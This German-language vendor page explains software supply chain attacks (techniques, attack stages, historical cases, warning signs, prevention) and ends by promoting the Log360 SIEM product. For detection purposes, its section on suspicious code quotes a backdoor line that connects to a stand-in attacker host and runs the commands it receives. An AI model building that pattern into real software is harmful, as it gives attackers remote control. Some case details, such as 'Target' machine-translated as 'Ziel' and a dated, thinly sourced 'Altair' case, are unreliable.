Lieferkette
Angriff auf die

 
  • Was ist ein Angriff auf die Lieferkette?
  • Angriff auf die Software-Lieferkette
  • Wie wird dieser Angriff ausgeführt?
  • Angriffsablauf
  • Beispiele für Supply-Chain-Angriffe
  • Wie man Angriffe auf die Lieferkette erkennt
  • Bewährte Verfahren zur Verhinderung eines Supply-Chain-Angriffs
  •  
Was ist ein Angriff auf die Lieferkette?

Was ist ein Angriff auf die Lieferkette?

Angriffe auf die Lieferkette sind eine ausgeklügelte, immer häufiger auftretende Form der Cyberbedrohung, die Organisationen über Schwachstellen in ihrem Lieferkettennetzwerk angreift. Im Gegensatz zu direkten Angriffen, die auf die eigenen Systeme einer Organisation abzielen, nutzen Angriffe auf die Lieferkette die Vernetzung moderner Geschäftsbeziehungen aus und zielen auf weniger sichere Elemente im Netzwerk ab, wie Drittanbieter, Softwarelieferanten oder Hardwarehersteller. Aus diesem Grund wird ein solcher Angriff auch als Drittanbieter- oder Wertschöpfungskettenangriff bezeichnet.

Angriff auf die Software-Lieferkette

Angriff auf die Software-Lieferkette

In den letzten Jahren sind Angriffe auf die Software-Lieferkette zu einem großen Problem geworden. Bei einem Angriff auf die Software-Lieferkette schleust der Angreifer bösartigen Code in den Code einer Anwendung ein und sendet ihn in Form eines Updates an das Gerät. Der bösartige Code kann leicht verbreitet werden, da die meisten modernen Softwareprogramme Open-Source-Code, APIs von Drittanbietern oder proprietären Code von Softwareanbietern enthalten. Dies könnte auch schwer zu verhindern sein, da Benutzergeräte möglicherweise über automatisierte Anwendungsaktualisierungen verfügen.

Wie wird dieser Angriff ausgeführt?

Wie wird dieser Angriff ausgeführt?

Im Gegensatz zu direkten Angriffen, die auf eine bestimmte Entität abzielen, nutzen Angriffe auf die Lieferkette die Vernetzung moderner Geschäftsabläufe aus. Das bedeutet, dass ein einziger Verstoß eine Vielzahl von Entitäten gleichzeitig gefährden kann, wodurch der potenzielle Schaden noch größer wird. Wenn eine Organisation versteht, wie sich diese Angriffe entwickeln, kann sie sich besser vorbereiten und wirksamere Sicherheitsstrategien umsetzen, wodurch sie letztlich widerstandsfähiger gegen diese ausgeklügelten Bedrohungen wird. Hier sind einige Möglichkeiten, wie ein Angriff auf die Software-Lieferkette ausgeführt werden kann:

  • Kompromittierter Source Code: Bedrohungsakteure nutzen diese Technik, um den Source Code eines Softwareprodukts zu infiltrieren. Dies kann durch eine Sicherheitslücke im Netzwerk des Entwicklers oder durch die Kompromittierung des Kontos eines Softwareentwicklers geschehen. Der bösartige Code wird dann unwissentlich durch Ausnutzung von Schwachstellen in Open-Source-Projekten verbreitet, da der Angreifer weiß, dass diese Projekte in zahlreichen nachgelagerten Anwendungen verwendet werden.
  • Schwachstellen von Drittanbietern: Bei dieser Art von Angriff nutzen Bedrohungsakteure Schwachstellen in Komponenten von Drittanbietern oder Bibliotheken aus, die in einem Softwareprodukt verwendet werden. Viele Softwareprodukte basieren auf Open-Source- oder Drittanbieterkomponenten, und eine Schwachstelle in einer dieser Komponenten kann ausgenutzt werden, um das Endprodukt zu kompromittieren.
  • Untergrabene Entwicklungstools: Angreifer können auch Tools ins Visier nehmen, die in der Softwareentwicklung verwendet werden, wie z. B. Compiler oder Code-Repositories. Durch die Kompromittierung dieser Tools können sie ohne Wissen der Entwickler bösartigen Code in Softwareprodukte einschleusen.
  • Insider-Bedrohung: Ein Insider innerhalb des Softwareunternehmens oder einer Partnerorganisation kann absichtlich Schwachstellen oder bösartigen Code in die Software einbringen.
  • Diebstahl von Code-Signing-Zertifikaten: Angreifer stehlen oder fälschen Code-Signing-Zertifikate, um ihre bösartige Software als legitim und vertrauenswürdig erscheinen zu lassen.
Angriffsablauf

Angriffsablauf

In den meisten Fällen ist dies der typische Ablauf und die Chronologie eines Angriffs auf die Lieferkette:

Ziel recherchieren und identifizieren: Zunächst wählen Angreifer ein Softwareprodukt oder ein Entwicklungsunternehmen aus, das weit verbreitet ist oder in die Systeme der Zielorganisationen integriert ist.

Softwareentwicklung infiltrieren: Anschließend infiltrieren die Angreifer den Softwareentwicklungsprozess. Dies kann durch eine Kompromittierung des Netzwerks des Softwareunternehmens oder durch das Einfügen von Schadcode in eine Drittanbieterkomponente erfolgen, von der die Software abhängig ist.

Einfügen von Schadcode: Sobald die Angreifer im System sind, fügen sie Schadcode in die Software ein. Dabei kann es sich um eine Backdoor, einen Trojaner oder eine andere Form von Malware handeln. Ziel ist es, sicherzustellen, dass dieser Code in das nächste Software-Update oder die nächste Version aufgenommen wird.

Verteilung der Software: Die kompromittierte Software wird dann an die Benutzer verteilt. Diese Verteilung erfolgt häufig auf legitime Weise und über normale Kanäle, wie Software-Updates oder Neuinstallationen.

Aktivierung der Malware: Wenn die Endbenutzer, einschließlich der Zielorganisation, die kompromittierte Software aktualisieren oder installieren, wird die Malware aktiviert.

Ausführung des Angriffs: Wenn die Malware aktiv ist, können Angreifer nun ihre beabsichtigten Aktionen ausführen, wie z. B. Datenexfiltration, Spionage oder weitere Infiltration des Zielnetzwerks.

Spuren verwischen und verschwinden: Schließlich könnten Angreifer versuchen, Spuren ihrer Infiltration zu verwischen, um nicht entdeckt zu werden, oder sie könnten das System verlassen, nachdem sie ihre Ziele erreicht haben. Sie können dies tun, indem sie Protokolle löschen, Zeitstempel manipulieren oder die Daten überschreiben.

Beispiele für Supply-Chain-Angriffe

Beispiele für Supply-Chain-Angriffe

Supply-Chain-Angriffe stellen seit Jahrzehnten eine erhebliche Bedrohung dar, aber ihre Zahl hat in den letzten Jahren zugenommen. Hier sind einige bemerkenswerte Supply-Chain-Angriffe, über die berichtet wurde.

  • Ziel: Im Jahr 2014 verschafften sich Cyberkriminelle über die Zugangsdaten eines Drittanbieters für HLK-Anlagen Zugang zum Netzwerk des Einzelhändlers. Sie installierten Malware auf Kassensystemen und gefährdeten so die Kreditkartendaten von Millionen von Kunden während der Weihnachtseinkaufssaison.
  • Altair technologies:
  • Beim Altair Technologies Supply-Chain-Angriff im Jahr 2017 infiltrierten Angreifer den Software-Erstellungsprozess der Server-Management-Software von Altair. Bösartiger Code wurde in legitime Software-Updates eingefügt, wodurch die Sicherheit von Systemen, die auf die kompromittierte Software angewiesen waren, potenziell gefährdet wurde.
  • ASUS: Beim ASUS-Lieferkettenangriff im Jahr 2018 kompromittierten Angreifer den Software-Update-Mechanismus des Unternehmens und lieferten bösartige Updates an ASUS-Benutzer. Dadurch konnten sie Software verteilen, die Hintertüren auf potenziell Hunderttausenden von ASUS-Computern installiert und weitere bösartige Aktivitäten ermöglicht.
  • SolarWinds:
  • Der SolarWinds-Lieferkettenangriff im Jahr 2020 war ein ausgeklügelter Cyber-Einbruch, der die Gefahr von Lieferkettenangriffen veranschaulichte. Bei dem Angriff wurde eine Hintertür in die IT-Verwaltungssoftware SolarWinds Orion eingefügt. Dieser Angriff wurde durch das Einschleusen von bösartigem Code namens „Sunburst“ in die Software von SolarWinds Orion ausgeführt, insbesondere in eine Komponente namens „SolarWinds.Orion.Core.BusinessLayer.dll“. Diese manipulierten Updates wurden dann an die Kunden von SolarWinds verteilt, darunter zahlreiche Regierungsbehörden und Unternehmen, wodurch die Angreifer monatelang in deren Netzwerke eindringen und diese überwachen konnten.
  • Log4j:Der Log4j-Lieferkettenangriff im Jahr 2021 war ein schwerwiegender Cybersicherheitsvorfall, bei dem eine kritische Schwachstelle in der weit verbreiteten Log4j-Protokollierungsbibliothek die Ausführung von Remote-Code ermöglichte. Angreifer nutzten diesen Fehler aus, indem sie eine bösartige Zeichenfolge in Protokollmeldungen oder Protokollparameter einfügten, die es ihnen ermöglichte, beliebigen Code auf den Zielsystemen auszuführen, wenn sie von der anfälligen Log4j-Bibliothek verarbeitet wurden.
  • Github: Im Jahr 2022 war GitHub einem bemerkenswerten Supply-Chain-Angriff ausgesetzt, bei dem ein böswilliger Akteur mehr als 35.000 Repositorys klonte und bösartigen Code hinzufügte, wobei er sie mit dem ursprünglichen Source Code identisch hielt. Dieser Code wurde entwickelt, um einen Fingerabdruck zu erstellen, der Details der Umgebung sammelt, in der er ausgeführt wurde. Darüber hinaus wurden bei diesem massiven Angriff 26 Open-Source-Projekte auf GitHub kompromittiert.
  • MOVEit: Der MOVEit-Lieferkettenangriff im Jahr 2023 war einer der größten seiner Art und betraf über 2.000 Organisationen und etwa 60 Millionen Einzelpersonen. Er begann im Mai 2023, als die russische Ransomware-Gruppe CL0P eine kritische SQL-Injection-Schwachstelle in MOVEit, einer weit verbreiteten Dateiübertragungsplattform, ausnutzte. Diese Schwachstelle verursachte letztlich Schäden in Höhe von fast 10 Milliarden US-Dollar.
Wie man Angriffe auf die Lieferkette erkennt

Wie man Angriffe auf die Lieferkette erkennt

Angriffe auf die Lieferkette sind heimtückisch, aber sie sind auch nachvollziehbar – wenn man weiß, wonach man suchen muss. Hier sind einige Anzeichen für einen Angriff auf die Lieferkette:

Ungewöhnlicher Netzwerkverkehr:

Erhöhte oder anomale Netzwerkaktivität, insbesondere Kommunikation mit unbekannten externen IPs oder Servern, was auf Datenexfiltration oder Command-and-Control-Kommunikation (C2) hindeutet.

Unerwartete Softwareänderungen:

Plötzliche oder unerklärliche Änderungen im Verhalten oder in der Leistung von Software, die auf Manipulationen hindeuten könnten.

Verdächtiger Code in Updates oder neuer Software:

Anomaler Code in aktuellen Updates oder Neuinstallationen, der nicht mit den Standard-Entwicklungsverfahren übereinstimmt. In einen Angriff auf die Software-Lieferkette eingebetteter Schadcode ist in der Regel so konzipiert, dass er unauffällig und effizient ist und auf das jeweilige Ziel oder die jeweilige Umgebung zugeschnitten ist. Hier ist ein Beispiel, das die allgemeinen Merkmale zeigt, wie dieser Code aussehen könnte:

cyber-security-supply-chain-attack

Aus dem in diesem Screenshot gezeigten Code geht hervor, dass die Erstellung einer Socket-Verbindung zu einem Remote-Server (s.connect(('attacker_control_server.com', 8080))) und die Ausführung empfangener Befehle (subprocess.getoutput(command)) charakteristisch für eine Backdoor sind. Dadurch können Angreifer das infizierte System fernsteuern oder Befehle darauf ausführen.

Nicht autorisierte Code-Commits:

Ungewöhnliche Commits oder Änderungen in Software-Repositorys, insbesondere durch nicht autorisierte oder unbekannte Benutzer.

Schwachstellen in Komponenten von Drittanbietern:

Entdeckung von Schwachstellen oder Hintertüren in Komponenten oder Bibliotheken von Drittanbietern, die in Ihrer Software verwendet werden.

Bewährte Verfahren zur Verhinderung eines Supply-Chain-Angriffs

Bewährte Verfahren zur Verhinderung eines Supply-Chain-Angriffs

Um Unternehmen vor der wachsenden Bedrohung durch Supply-Chain-Angriffe zu schützen, ist es unerlässlich, eine robuste Strategie zu implementieren. Hier sind einige bewährte Verfahren, die Sie anwenden können, um einen Supply-Chain-Angriff zu verhindern.

Führen Sie regelmäßige Sicherheitsbewertungen durch und halten Sie Software-Updates auf dem neuesten Stand

Stellen Sie eine kontinuierliche Überwachung auf Schwachstellen in Ihren Systemen sicher, einschließlich der Aktualisierung aller Softwaretypen wie Betriebssysteme, Anwendungen und Sicherheitsdienstprogramme. Implementieren Sie verfügbare Updates und Patches sofort nach ihrer Veröffentlichung.

0 1

Überprüfen Sie Lieferanten und Partner

Führen Sie vor der Nutzung der Dienste von Drittanbietern gründliche Sicherheitsbewertungen aller Drittanbieter und ihrer Produkte durch.

0 2

Regulieren Sie den Zugriff von Drittanbietern

Beschränken und überwachen Sie den Zugriff von Drittanbietern auf Ihre Netzwerke und Systeme.

0 3

Implementieren Sie ein Zero-Trust-System

Zero Trust überprüft und beschränkt den Zugriff rigoros, ohne Vertrauen vorauszusetzen, um sich vor unbefugten Eingriffen in die Lieferkette zu schützen. Dieser Ansatz stärkt die Prävention gegen Angriffe auf die Lieferkette.

0 4

Implementieren Sie robuste Sicherheitsprotokolle

Verwenden Sie starke Zugriffskontrollen, Verschlüsselung und MFA, um Systeme und Daten zu schützen.

0 5

Implementieren Sie eine SIEM-Lösung

Eine SIEM-Lösung überwacht kontinuierlich die Ereignisse in Ihrem Netzwerk und analysiert sie in Echtzeit, um Bedrohungen oder Anomalien zu erkennen. Sie nutzt auch Bedrohungsinformationen, um sofort und automatisch auf Vorfälle zu reagieren und so Ihre Sicherheitslage zu verbessern.

0 6
Erkennen und entschärfen Sie Angriffe auf die Lieferkette mit Log360

Erkennen und entschärfen Sie Angriffe auf die Lieferkette mit Log360

Die fortschrittlichen Funktionen von Log360 helfen Ihnen, Angriffe auf die Lieferkette effektiv zu erkennen und zu entschärfen.

Echtzeit-Korrelation und Warnmeldungen

Angriffe auf die Lieferkette können nicht anhand einzelner Ereignisse erkannt werden, sondern anhand einer Reihe von Ereignissen, die, wenn sie miteinander in Beziehung gesetzt werden, auf einen potenziellen Angriff auf die Lieferkette hinweisen. Log360 verfügt über mehr als 30 vordefinierte Korrelationsregeln, mit denen gängige Cyberangriffe erkannt werden können. Sie können die Korrelationsregeln auch mithilfe des benutzerdefinierten Regelgenerators an Ihre Anforderungen anpassen.

Mit Log360 können Sie Warnprofile einrichten, die Sie sofort benachrichtigen, wenn eine Reihe von Ereignissen auftritt, die auf einen Angriff auf die Lieferkette hindeuten.

Verhaltensanalyse von Benutzern und Entitäten (UEBA)

Mit dem UEBA-Modul von Log360 können Sie maschinelles Lernen nutzen und Echtzeit- und historische Protokolldaten verwenden, um eine Basislinie des üblichen Verhaltens für jeden Benutzer und jede Entität in Ihrem Netzwerk zu erstellen. Jede Abweichung von dieser Baseline wird als Anomalie markiert und Sie werden sofort benachrichtigt, um schnell und effizient auf Vorfälle reagieren zu können.

Überwachung der Dateiintegrität

Log360 bietet Berichte zur Nachverfolgung des Zugriffs auf Dateien und Ordner sowie aller Änderungen, Erstellungen, Löschungen oder Berechtigungsänderungen mithilfe des integrierten Moduls zur Überwachung der Dateiintegrität. Alle derartigen Ereignisse, wie z. B. eine große Anzahl nicht autorisierter Änderungen, Löschungen oder Erstellungen von Dateien, würden eine Warnmeldung auslösen, um schnell auf Vorfälle reagieren zu können. Darüber hinaus nutzt es das UEBA-Modul, um Anomalien anhand des Ereignismusters zu identifizieren und potenzielle Bedrohungen zu melden, die möglicherweise übersehen wurden.

Reaktion auf Vorfälle

Mit Log360 können Sie regelbasierte Warnmeldungen generieren, die Sie benachrichtigen, wenn verdächtige Software installiert wird und nicht autorisierte Änderungen vorgenommen werden. Sie können dann vordefinierte und benutzerdefinierte Workflows mit den erkannten Ereignissen verwenden, um Ihre Reaktion auf Vorfälle zu automatisieren, indem Sie das Gerät isolieren, um weitere Gefährdungen zu verhindern, und sich sofort per E-Mail oder SMS benachrichtigen lassen.

Mit Log360 können Sie Angriffe auf die Lieferkette eindämmen. Erfahren Sie, wie!